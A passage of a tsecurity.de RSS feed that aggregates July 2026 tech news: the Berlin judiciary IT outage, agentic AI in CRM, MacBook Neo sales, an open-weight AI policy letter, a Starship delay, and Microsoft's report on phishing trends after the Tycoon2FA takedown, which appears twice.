<description><![CDATA[Author: heise &amp; c't - Bewertung: 1012x - Views:18296 Ein fehlerhaftes Software-Update hat die komplette Berliner Justiz lahmgeleg. Wir erklären, wie es zum IT-Totalausfall kam.

► Sponsorenhinweis
Mit Mammouth bekommt ihr Zugriff auf KI-Modelle wie GPT, Claude, Gemini, Mistral, Grok, DeepSeek...]]></description>
<link>https://tsecurity.de/de/3693220/videos/it-totalausfall-in-berlin-gerichte-komplett-lahmgelegt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693220/videos/it-totalausfall-in-berlin-gerichte-komplett-lahmgelegt/</guid>
<pubDate>Sat, 25 Jul 2026 08:35:35 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: heise &amp;amp; c&#039;t - Bewertung: 1012x - Views:18296 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/TbNpAxHFvr8?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>Ein fehlerhaftes Software-Update hat die komplette Berliner Justiz lahmgeleg. Wir erklären, wie es zum IT-Totalausfall kam.<br />
<br />
► Sponsorenhinweis<br />
Mit Mammouth bekommt ihr Zugriff auf KI-Modelle wie GPT, Claude, Gemini, Mistral, Grok, DeepSeek, Perplexity, Flux, Nano Banana und Recraft – alles vereint an einem Ort. Alles im Starterpaket brutto ab 11,90€ / Monat bei monatlicher Laufzeit oder 9,92€ / Monat bei jährlicher Laufzeit mit Vorauszahlung. Mehr Infos: http://mammouth.ai<br />
<br />
► Zu den Artikeln:<br />
Berliner Justiz-IT nach Lizenzproblemen komplett ausgefallen: https://www.heise.de/-11363631.html<br />
Software-Update Ursache von IT-Problemen der Berliner Justiz: https://www.heise.de/-11365024.html<br />
_____<br />
<br />
► c’t: https://www.ct.de<br />
► heise online: https://www.heise.de<br />
► heise online auf Instagram: https://www.instagram.com/heiseonline/<br />
► c&#039;t auf Instagram: https://www.instagram.com/ct_magazin/<br />
_____<br />
Redaktion &amp; Video: Gordon Hof<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[7 CRM trends for 2026: AI brings decisive action to customer workflows]]></title>
<description><![CDATA[Agentic AI has advanced from the promises-and-pilots phase of 2025 to reality and rollouts in 2026. In the process, agentic AI is transforming virtually every aspect of customer relationship management (CRM), the platform that manages sales, marketing, and customer service.



“Last year, everybo...]]></description>
<link>https://tsecurity.de/de/3693117/it-nachrichten/7-crm-trends-for-2026-ai-brings-decisive-action-to-customer-workflows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693117/it-nachrichten/7-crm-trends-for-2026-ai-brings-decisive-action-to-customer-workflows/</guid>
<pubDate>Sat, 25 Jul 2026 06:53:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Agentic AI has advanced from the promises-and-pilots phase of 2025 to reality and rollouts in 2026. In the process, agentic AI is transforming virtually every aspect of <a href="https://www.cio.com/article/272365/what-is-crm-software-for-managing-customer-data.html">customer relationship management (CRM)</a>, the platform that manages sales, marketing, and customer service.</p>



<p class="wp-block-paragraph">“Last year, everybody was dipping their toes into the water,” says <a href="https://futurumgroup.com/keith-kirkpatrick/">Keith Kirkpatrick</a>, research director at The Futurum Group. This year, agentic AI has built momentum from the boardroom down, with companies recognizing that having an AI strategy is imperative. “They feel like if they don’t embrace it now, their competitors will.”</p>



<p class="wp-block-paragraph"><a href="https://www.deloitte.com/global/en/about/people/profiles.gx-harry-datwani+f20748dc.html">Harry Datwani</a>, a principal at Deloitte Digital, adds that enterprise CRM customers have transitioned from “proof of concept” to “scale and execution.”</p>



<p class="wp-block-paragraph">“Across sales, service, marketing, even in the commerce space, enterprises are really using AI and agentic,” he says.</p>



<p class="wp-block-paragraph">“CRM in 2026 is undergoing a structural shift, not just an incremental evolution,” says Forrester analyst <a href="https://www.forrester.com/analyst-bio/kate-leggett/BIO2629">Kate Leggett</a>, noting that AI is becoming a core part of CRM infrastructure, not just a feature or an add-on. According to Forrester data, around 70% of companies are already using AI in their CRM systems, she says.</p>



<p class="wp-block-paragraph">Here are the hot AI-driven trends in CRM this year.</p>



<h2 class="wp-block-heading">CRM becomes an action hero</h2>



<p class="wp-block-paragraph">CRM platforms have traditionally served as passive, static systems of record. Now, agentic AI is transforming CRM into a powerful, real-time solution that can act autonomously.</p>



<p class="wp-block-paragraph">“Organizations that rethink CRM as a real-time, AI-powered system of action — and embrace agentic AI to handle complex, unpredictable work — are better positioned to deliver exceptional customer experiences,” says IDC analyst <a href="https://my.idc.com/getdoc.jsp?containerId=PRF005191">Neil Ward-Dutton</a>. “This approach not only enhances satisfaction and loyalty but also drives operational efficiency and business agility.”</p>



<p class="wp-block-paragraph">Forrester’s Leggett says that AI-powered CRM platforms have advanced from simple data capture to real-time decision-making and execution. Standard capabilities include next-best action recommendations, call summaries, automated updates, generated emails, knowledge creation, predictive forecasting, and deal scoring.</p>



<p class="wp-block-paragraph">She adds that AI agents can now execute workflows, such as routing cases, sending follow-ups, and updating records (with human oversight). They can also handle end-to-end service and sales tasks autonomously, including case resolutions and sales development activities.</p>



<h2 class="wp-block-heading">Agentic drives workforce changes</h2>



<p class="wp-block-paragraph">AI use in CRM systems is also impacting workforce strategies.</p>



<p class="wp-block-paragraph">“We used to hire for deep expertise,” says Constellation Research analyst <a href="https://www.constellationr.com/user/liz-miller">Liz Miller</a>. “AI has commoditized expertise because I can take all that data from my CRM and train my AI models to go deep, to know everything about any product I’ve ever sold, from what has worked, what hasn’t, every price, every sale.”</p>



<p class="wp-block-paragraph">Now, instead of hiring candidates with deep expertise, organizations are looking for candidates who can go wide. “I can train a model to have deep expertise. What I can’t train for is experience, because experience is what happens when a person has gone broad across a lot of different scenarios and faced complexity across that broad scenario,” says Miller.</p>



<p class="wp-block-paragraph">For example, AI systems can automate many aspects of marketing, Miller notes, but there’s no substitute for creativity: people who can interrogate the data and come up with innovative marketing campaigns that connect with customers.</p>



<p class="wp-block-paragraph"><a href="https://www.servicenow.com/workflow/author/terence-chesire.html">Terence Chesire</a>, group vice president of ServiceNow CRM and industry workflows, says that organizations are using agentic AI to free up team members from repetitive, lower-value activities. Those employees have now moved to higher-level roles “where they’re working on transformational deals rather than just building a spreadsheet.”</p>



<p class="wp-block-paragraph">“That’s what we’re seeing as super-exciting as organizations not just free up people, but the speed and effort reduction and the friction reduction in what they can do,” he adds.</p>



<h2 class="wp-block-heading">Data layer takes center stage</h2>



<p class="wp-block-paragraph">AI’s promise to deliver actionable customer and marketing intelligence has placed even greater emphasis on the importance on sound data management practices for CRM.</p>



<p class="wp-block-paragraph">“The light bulb has flashed on very brightly for our clients,” says Deloitte’s Datwani. “Everyone is talking about AI agents, but your ability to really extract value is inextricably linked to the quality of your data and the ability to make that data accessible. What we’re finding is that despite large investments over time our clients still have fragmented data. And so, they are data rich and insight poor.”</p>



<p class="wp-block-paragraph">The good news, says Datwani, is that AI agents themselves can <a href="https://www.cio.com/article/2140371/gen-ai-can-be-the-answer-to-your-data-problems-but-not-all-of-them.html">help clean up and organize data</a>. And vendors such as <a href="https://www.cio.com/article/4030966/snowflake-and-databricks-vie-for-the-heart-of-enterprise-ai.html">Snowflake and Databricks</a>, along with the traditional CRM powerhouses, are offering powerful data analytics solutions. “Everyone is battling for that data layer,” Datwani says.</p>



<p class="wp-block-paragraph">Forrester’s Leggett adds that CRM platforms are converging with <a href="https://www.cio.com/article/308839/top-8-customer-data-platforms.html">customer data platforms (CDPs)</a>, real-time event streams, and external data sources to create connected customer data networks. These real-time, connected data models can help organizations deliver hyper-personalization at scale.</p>



<h2 class="wp-block-heading">Agentic ushers in pricing complexity</h2>



<p class="wp-block-paragraph">The shift from license- or subscription-based pricing to an <a href="https://www.cio.com/article/3624540/how-will-ai-agents-be-priced-cios-need-to-pay-attention.html">outcome or consumption pricing model</a> has the potential to help CIOs tie their CRM costs to specific business metrics, such as the number of customer service calls resolved per hour. But it has also introduced a <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">new level of complexity</a> when it comes to budgeting for CRM costs.</p>



<p class="wp-block-paragraph">For example, Chesire says ServiceNow’s CRM pricing plan starts with a baseline subscription model, and on top of that, customers get a certain number of AI tokens per user and can buy additional tokens as AI usage ramps up.</p>



<p class="wp-block-paragraph">Meanwhile, Salesforce has <a href="https://www.cio.com/article/4189183/salesforce-unveils-ai-help-agent-with-pay-per-resolution-pricing.html">rolled out pay-per-resolution pricing</a> with its recently unveiled AI Help Agent and last month <a href="https://www.cio.com/article/4183667/salesforce-to-acquire-usage-based-billing-specialist-m3ter.html">acquired usage-based billing specialist m3ter</a>. Oracle is also <a href="https://www.cio.com/article/4184271/oracle-wades-into-outcome-based-ai-billing-waters.html">piloting outcome-based AI pricing</a>.</p>



<p class="wp-block-paragraph">All these approaches undercut the predictability of the subscription model, which will complicate CIOs’ cost calculus, Deloitte’s Datwani says. “Now, as you start to think about consumption and tokens, costs might look different. As folks are opening up the architecture with things like headless CRM, what will the cost model look like for API calls or MCP server calls? So, there’s many more variables,” he adds.</p>



<h2 class="wp-block-heading">The rise of multi-agent orchestration</h2>



<p class="wp-block-paragraph">To act autonomously, agents need to access multiple data sets and software platforms seamlessly. As a result, the proliferation of agents, some embedded within specific vendor platforms and some created in-house, is going to require an orchestration layer, Futurum’s Kirkpatrick says.</p>



<p class="wp-block-paragraph">He points out that organizations need to monitor and manage agents, enforcing the same type of policy-based access control that exists for people. Organizations also need to set limits on what domains a specific agent can get into, what types of data they can access, what lines can’t they cross.</p>



<p class="wp-block-paragraph">Kirkpatrick predicts that a <a href="https://www.cio.com/article/4138739/21-agent-orchestration-tools-for-managing-your-ai-fleet.html">new class of orchestration tools</a> will emerge, although it’s not clear whether that orchestration layer will be provided by the leading CRM vendors, hyperscalers, or third parties.</p>



<p class="wp-block-paragraph">Datwani agrees. “The orchestration layer is an interesting area, where the traditional vendors are in on it, the hyperscalers are also offering it, and there are third parties. It’s my belief that there’s not going to be a clear winner.”<em></em></p>



<h2 class="wp-block-heading">The interface becomes conversational</h2>



<p class="wp-block-paragraph">Enterprise users who have traditionally had to manually wrangle with CRM systems are likely to find the ability to employ voice commands using a natural language interface to be a game changer. For starters, a salesperson can say, “I have a meeting today with Customer X. Help me prepare.” The agent will collect relevant data, ingest it, and provide a summary with recommendations.</p>



<p class="wp-block-paragraph">ServiceNow’s Chesire says voice-enabled CRM systems have an “almost magical” ability to record, transcribe, and understand the content of a call between a salesperson and a customer or potential customer. The system can then “build a quote” based on that conversation.</p>



<p class="wp-block-paragraph">On the customer service side of the equation, AI-driven voice technology enables customers to speak to an AI agent, describe the problem using natural language, and get a response. The agent has the capability to, for example, solve a credit card dispute, order a replacement product, send out a service rep, or do whatever is needed to resolve the issue, says Chesire.</p>



<p class="wp-block-paragraph">Beyond that, agentic technology is capable of understanding the underlying business process flaws that led to the product snafu, and make recommendations for ways to fix whatever led to the issue in the first place, he adds.</p>



<h2 class="wp-block-heading">Agentic drives business process transformation</h2>



<p class="wp-block-paragraph">With the emergence of outcome-based pricing, organizations are taking a fresh look at how they measure the benefits of CRM systems. That conversation is leading to an even more important analysis of underlying business processes. Or, as Constellation’s Miller says, “The old adage of applying new technology to old processes only gets you more expensive old processes.”</p>



<p class="wp-block-paragraph">“When we survey customers, we hear time and time again that the reason why they want to apply AI into their organizations is to foster exponential opportunity and exponential growth,” she says. “How do we get there with CRM has started to become the new conversation.”</p>



<p class="wp-block-paragraph">According to Miller, AI systems breach the walls of siloed data and can take a fresh look at legacy workflows. They also don’t get sucked into turf wars between marketing and sales teams. As a result, they often recommend new actions that can lead to better processes. “I think it’s starting to happen. You’re starting to see applications where AI is beginning to accelerate decision-making and decision velocity,” she says.</p>



<p class="wp-block-paragraph">“The next phase of maturity is going to be, how do we start to spread AI across our platforms so that we are seeing that holistic end-to-end relationship that we have always wanted to optimize. How do we thread that across platforms and across solutions. We’re starting to see organizations on the leading edge really start to pull those strategies together,” says Miller.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[MacBook Neo’s success wasn’t luck, it was a plan]]></title>
<description><![CDATA[It’s difficult to ignore the fact that Apple seems to have turned its MacBook Neo into a weapon to promote platform growth, with enough performance under the hood to make competitors seem inferior.



And even as the PC industry moves to try to compete with Apple’s last huge Mac success, the comp...]]></description>
<link>https://tsecurity.de/de/3693115/it-nachrichten/macbook-neos-success-wasnt-luck-it-was-a-plan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693115/it-nachrichten/macbook-neos-success-wasnt-luck-it-was-a-plan/</guid>
<pubDate>Sat, 25 Jul 2026 06:47:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">It’s difficult to ignore the fact that Apple seems to have <a href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html">turned its MacBook Neo into a weapon</a> to promote platform growth, with enough performance under the hood to make competitors seem inferior.</p>



<p class="wp-block-paragraph">And even as the PC industry moves to try to compete with Apple’s last <a href="https://www.applemust.com/macbook-neo-continues-to-top-amazon-laptop-charts-in-us-uk/" target="_blank" rel="noreferrer noopener">huge Mac success</a>, the company is already planning a powerful follow-up.</p>



<p class="wp-block-paragraph">That points to the discipline Apple has applied to the Mac since the introduction of Apple Silicon. The company has built a clear product roadmap, strong entry-level pricing, and steady performance gains. This focus is now paying dividends, giving people the impetus to keep placing their trust in Apple and its Macs — even as the industry raises prices in the face of RAMageddon and price increases. </p>



<h2 class="wp-block-heading"><strong>The numbers don’t lie</strong></h2>



<p class="wp-block-paragraph">“Apple’s recent price increase seems to be an inevitable response to these cost increases. In the second half of the year, other PC OEMs are expected to continue to raise prices, and the overall ASP increase is expected to continue,” <a href="https://counterpointresearch.com/en/insights/global-pc-shipments-decline-q2-2026-memory-crisis" data-type="link" data-id="https://counterpointresearch.com/en/insights/global-pc-shipments-decline-q2-2026-memory-crisis" target="_blank" rel="noreferrer noopener">Counterpoint said in a post Wednesday</a>. The researcher tells us global PC shipments shrank 4% in the second quarter of 2026 as rising costs hit demand. The Mac maker, by contrast, moved in the opposite direction, generating 13% growth in the quarter — mainly on the back of the MacBook Neo introduction. </p>



<p class="wp-block-paragraph"><a href="https://www.idc.com/resource-center/press-releases/2q26-pc-top5/" target="_blank">Recent IDC data</a> gives Apple 10.1% year-over-year growth and just under 10% (9.9% to be exact) of the worldwide PC market, even as the overall market declined 4.9%.</p>



<p class="wp-block-paragraph">“With emerging supply chain and tariff challenges inflating memory prices…, Apple’s incredibly aggressive price-point for the MacBook Neo makes its release feel all the more like a gut punch to one of the PC market’s most valuable price tiers,” Futurum Research Director <a href="https://www.computerworld.com/article/4143010/apples-macbook-neo-first-reviews-and-analyst-reactions.html" data-type="link" data-id="https://www.computerworld.com/article/4143010/apples-macbook-neo-first-reviews-and-analyst-reactions.html">Olivier Blanchard said when the Neo was released</a>. </p>



<h2 class="wp-block-heading"><strong>Neo 2.0 is already coming</strong></h2>



<p class="wp-block-paragraph">In the immediate future, as competitors raise prices on the PCs that compete with Apple’s lower-cost device, Cupertino is <a href="https://www.culpium.com/p/apple-in-talks-to-boost-mac-neo-production" target="_blank" rel="noreferrer noopener">already plotting</a> the path toward <a href="https://www.bloomberg.com/news/articles/2026-07-22/apple-to-launch-new-macbook-air-imac-macbook-pro-neo-mac-mini-mac-studio" target="_blank" rel="noreferrer noopener">MacBook Neo 2.</a> Reports claim this will debut in March in new colors and use the A19 Pro chip from the iPhone 17 Pro, with performance boosted by slightly more unified memory (12GB, rather than 8GB). That’ll make it a much better Mac, likely with 10-15% performance gains and the ability to run Apple Intelligence, making it the best and most affordable AI PC in its class.</p>



<p class="wp-block-paragraph">Just four months after the Neo’s rollout, Apple is already in position to leak rumors of an even more computationally capable follow-up, while competitors struggle to compete with the original on performance, build quality, and price. Still, the Neo might get more expensive, reporting warns, with the lowest-price 256GB model now gone, making the $599 Mac a mirage we can only wistfully hope to see again. </p>



<p class="wp-block-paragraph">That might matter less in context, as PC makers everywhere boost prices while RAM, chips, and storage prices head north, along with transport, logistics, and energy costs. “While [Apple] did raise prices in line with the broader market, it still remains well positioned against rivals facing the same cost pressures,” said Jean Philippe Bouchard, vice president for consumer devices at IDC. </p>



<p class="wp-block-paragraph">“As market conditions continue to worsen, the importance of supply chain management and capabilities are increasingly important,” Bouchard said. “The largest vendors, with their buying power and long-standing supplier ties, are best positioned to take share from smaller rivals.”</p>



<h2 class="wp-block-heading"><strong>This was never about luck</strong></h2>



<p class="wp-block-paragraph">This isn’t solely a market take about competition, it’s about planning.</p>



<p class="wp-block-paragraph">Few in the industry seemed prepared for the massive memory price increases that hit this year. Apple clearly planned its low-cost Mac well before that happened, hoping to seize the PC market at the low-mid-range. This is precisely what it seems to have done, what it continues to do, and what it will continue to do.</p>



<p class="wp-block-paragraph">The recent reports that it has a successor planned shows the breadth of the Mac company’s strategic vision, as Apple has quite clearly sought to fully exploit the failings of Windows and the internal contradictions of a value-conscious industry in stiff competition with itself.</p>



<p class="wp-block-paragraph">With the first M-series Macs about to enter the replacement cycle, Apple has built a market it can capitalize on for at least a decade, meaning it already has a vision for PC sales that extends at least as far. That’s the kind of road map corporate purchasers want when they make platform deployment decisions, which is why Apple’s 10% share gains are the beginning of <a href="https://www.computerworld.com/article/4150717/hexnode-ceo-macbook-neo-forces-it-to-rethink-its-budget-laptop-strategy.html">even more significant market change</a>. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to my daily Apple-related news summaries at <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta, Microsoft, Nvidia, IBM, and others back open-weight AI]]></title>
<description><![CDATA[Two dozen companies and organisations signed an open letter urging US policymakers to protect open-weight AI models. The letter, published today (PDF), carries signatures from a list that spans direct commercial rivals and organisations with little obvious overlap in business model: Meta, Microso...]]></description>
<link>https://tsecurity.de/de/3692025/ai-nachrichten/meta-microsoft-nvidia-ibm-and-others-back-open-weight-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692025/ai-nachrichten/meta-microsoft-nvidia-ibm-and-others-back-open-weight-ai/</guid>
<pubDate>Fri, 24 Jul 2026 18:22:20 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two dozen companies and organisations signed an open letter urging US policymakers to protect open-weight AI models. The letter, published today (PDF), carries signatures from a list that spans direct commercial rivals and organisations with little obvious overlap in business model: Meta, Microsoft, Nvidia, IBM, Dell Technologies, CrowdStrike, Palantir, ServiceNow, Hugging Face, Perplexity, Mistral, Andreessen […]</p>
<p>The post <a href="https://www.artificialintelligence-news.com/news/meta-microsoft-nvidia-ibm-others-back-open-weight-ai/">Meta, Microsoft, Nvidia, IBM, and others back open-weight AI</a> appeared first on <a href="https://www.artificialintelligence-news.com/">AI News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft, tech companies throw weight behind spread of open-source AI]]></title>
<description><![CDATA[Other signatories of the letter include Meta, Palantir, Perplexity, Mistral, NVIDIA, Mozilla, The Linux Foundation, Hugging Face, Dell Technologies and IBM.
The post Microsoft, tech companies throw weight behind spread of open-source AI appeared first on CyberScoop.]]></description>
<link>https://tsecurity.de/de/3691896/it-security-nachrichten/microsoft-tech-companies-throw-weight-behind-spread-of-open-source-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691896/it-security-nachrichten/microsoft-tech-companies-throw-weight-behind-spread-of-open-source-ai/</guid>
<pubDate>Fri, 24 Jul 2026 17:33:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Other signatories of the letter include Meta, Palantir, Perplexity, Mistral, NVIDIA, Mozilla, The Linux Foundation, Hugging Face, Dell Technologies and IBM.</p>
<p>The post <a href="https://cyberscoop.com/tech-leaders-open-source-ai-cybersecurity/">Microsoft, tech companies throw weight behind spread of open-source AI</a> appeared first on <a href="https://cyberscoop.com/">CyberScoop</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SpaceX to try its luck again with Starship Flight 13 after engines and weather say no]]></title>
<description><![CDATA[Replacement Raptors head for liftoff without a static fire test]]></description>
<link>https://tsecurity.de/de/3691606/it-nachrichten/spacex-to-try-its-luck-again-with-starship-flight-13-after-engines-and-weather-say-no/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691606/it-nachrichten/spacex-to-try-its-luck-again-with-starship-flight-13-after-engines-and-weather-say-no/</guid>
<pubDate>Fri, 24 Jul 2026 15:03:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Replacement Raptors head for liftoff without a static fire test]]></content:encoded>
</item>
<item>
<title><![CDATA[Email threats changed after the Tycoon2FA take-down]]></title>
<description><![CDATA[Traditional phishing techniques are in decline as a result of the disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.



“Phishing volume linked to the platform fell 92% from pre-disruption aver...]]></description>
<link>https://tsecurity.de/de/3691276/it-nachrichten/email-threats-changed-after-the-tycoon2fa-take-down/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691276/it-nachrichten/email-threats-changed-after-the-tycoon2fa-take-down/</guid>
<pubDate>Fri, 24 Jul 2026 12:33:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional phishing techniques are in decline as a result of the <a href="https://www.csoonline.com/article/4140890/microsoft-leads-takedown-of-tycoon2fa-phishing-service-infrastructure.html">disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform</a>, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.</p>



<p class="wp-block-paragraph">“Phishing volume linked to the platform fell 92% from pre-disruption averages, including QR code phishing and CAPTCHA-gated phishing both declining from their March highs,” the company wrote in <a href="https://www.microsoft.com/en-us/security/blog/2026/07/23/email-threat-landscape-q2-2026-trends-and-insights/">the report</a>.</p>



<p class="wp-block-paragraph">The takedown reduced activity across multiple phishing categories, forcing attackers to shift to newer delivery methods.</p>



<p class="wp-block-paragraph">Riding this shift in were a few notable phishing campaigns, including an automated <a href="https://www.csoonline.com/article/575559/business-email-compromise-scams-take-new-dimension-with-multi-stage-attacks.html">business email compromise</a> (BEC) campaign that reached 42,000 organizations in under three hours, and a multi-stage phishing campaign that used nested email (EML) files, calendar invitations, and a Microsoft authentication redirect to deliver malware.</p>



<p class="wp-block-paragraph">To counter phishing attacks, Microsoft recommends blocking emails containing known bad URLs/ subject fields, enabling password-less authentication methods, or moving to <a href="https://www.csoonline.com/article/4176814/security-experts-caution-mfa-alone-can-no-longer-stop-threat-actors.html">MFA</a> for accounts that still require passwords.</p>



<h2 class="wp-block-heading">Tycoon2FA disruption sent attackers exploring</h2>



<p class="wp-block-paragraph">The take-down of <a href="https://www.csoonline.com/article/4100393/hybrid-2fa-phishing-kits-are-making-attacks-harder-to-detect.html">Tycoon2FA</a> forced its operators to abandon portions of their infrastructure and rework hosting, domain registrations, and delivery mechanisms.</p>



<p class="wp-block-paragraph">“After falling 15% in March and another 22% in April, Tycoon2FA-linked phishing volume dropped 74% in May to just 1.5 million messages, then fell another 20% in June to 1.2 million, by far the lowest monthly volumes observed in at least a year,” Microsoft said.</p>



<p class="wp-block-paragraph">The decline extended to QR Code <a href="https://www.csoonline.com/article/3557585/attackers-are-using-qr-codes-sneakily-crafted-in-ascii-and-blob-urls-in-phishing-emails.html">lures</a> and fake CAPTCHA <a href="https://www.csoonline.com/article/3829416/fake-captcha-attacks-are-increasing-say-experts.html">pages</a>, two phishing techniques in which Tycoon2FA accounted for 12% and 14% of industry activity in June, respectively. This indicated that the platform’s customer base had not been able to migrate to a replacement infrastructure.</p>



<p class="wp-block-paragraph">But cutting off one head of the hacker hydra only gave rise to new tactics elsewhere.</p>



<p class="wp-block-paragraph">The adaptation came in the form of using Microsoft <a href="https://www.csoonline.com/article/4160858/attackers-abuse-microsoft-teams-to-impersonate-the-it-helpdesk-in-a-new-enterprise-intrusion-playbook.html">Teams as a social engineering channel</a>. Attackers established conversations to build trust before attempting credential theft or delivering malicious payloads. “Teams-based phishing volume climbed steadily throughout Q2, with the average number of detected attacks rising 19% from March to April, holding roughly flat into May (+1%), then increasing another 10% into June,” Microsoft said.</p>



<p class="wp-block-paragraph">Microsoft also observed a highly automated BEC campaign that reached over 67,000 users using scripted emails, Amazon Simple Email Service (SES), and engagement tracking, alongside a separate phishing campaign targeting 107,000 users that abused Microsoft’s authentication flow and trusted cloud services, including Teams archive recording and ICS calendar invite, to disguise malware delivery behind legitimate infrastructure.</p>



<h2 class="wp-block-heading">Phishing changes but the defense doesn’t</h2>



<p class="wp-block-paragraph">While QR Code and Captcha-based phishing attacks dropped significantly in the second quarter, business email compromise (BEC) charted jumped 121% between March and April, before dropping down again in May.</p>



<p class="wp-block-paragraph">QR Code phishing represented 8.3 million attacks in June 2026, down from a peak of 18.7 million in March. Similarly, Captcha-gated phishing fell from 12 million attacks in March to 2.2 million in June.</p>



<p class="wp-block-paragraph">BEC attacks hit 9 million in March, falling to 3.9 million in June.</p>



<p class="wp-block-paragraph">But even as these phishing classics lost momentum and newer techniques emerged, Microsoft’s defensive advice remained rooted in the basics. It noted organizations should complement email filtering with phishing-resistant authentication such as passkeys and phishing-resistant <a href="https://www.csoonline.com/article/3535222/mfa-adoption-is-catching-up-but-is-not-quite-there.html">MFA</a> to reduce the effectiveness of credential theft campaigns.</p>



<p class="wp-block-paragraph">The company also recommended strengthening Exchange Online Protection and Microsoft Defender for Office 365 with capabilities such as Safe links and Zero-hour Auto Purge (ZAP), in which malicious emails already delivered to mailboxes are removed before they are read, alongside enforcing password-less authentication methods like Windows Hello, <a href="https://www.csoonline.com/article/4040128/fido-undermined.html">FIDO </a>keys, and Microsoft Authenticator.</p>



<p class="wp-block-paragraph">Microsoft concluded its report with a list of indicators of compromise (IoCs) from the threats observed in the quarter to support detection efforts.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.csoonline.com/article/4201146/tycoon2fa-takedown-reshapes-the-phishing-landscape.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tycoon2FA takedown reshapes the phishing landscape]]></title>
<description><![CDATA[Traditional phishing techniques are in decline as a result of the disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.



“Phishing volume linked to the platform fell 92% from pre-disruption aver...]]></description>
<link>https://tsecurity.de/de/3691257/it-security-nachrichten/tycoon2fa-takedown-reshapes-the-phishing-landscape/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691257/it-security-nachrichten/tycoon2fa-takedown-reshapes-the-phishing-landscape/</guid>
<pubDate>Fri, 24 Jul 2026 12:26:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional phishing techniques are in decline as a result of the <a href="https://www.csoonline.com/article/4140890/microsoft-leads-takedown-of-tycoon2fa-phishing-service-infrastructure.html">disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform</a>, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.</p>



<p class="wp-block-paragraph">“Phishing volume linked to the platform fell 92% from pre-disruption averages, including QR code phishing and CAPTCHA-gated phishing both declining from their March highs,” the company wrote in <a href="https://www.microsoft.com/en-us/security/blog/2026/07/23/email-threat-landscape-q2-2026-trends-and-insights/">the report</a>.</p>



<p class="wp-block-paragraph">The takedown reduced activity across multiple phishing categories, forcing attackers to shift to newer delivery methods.</p>



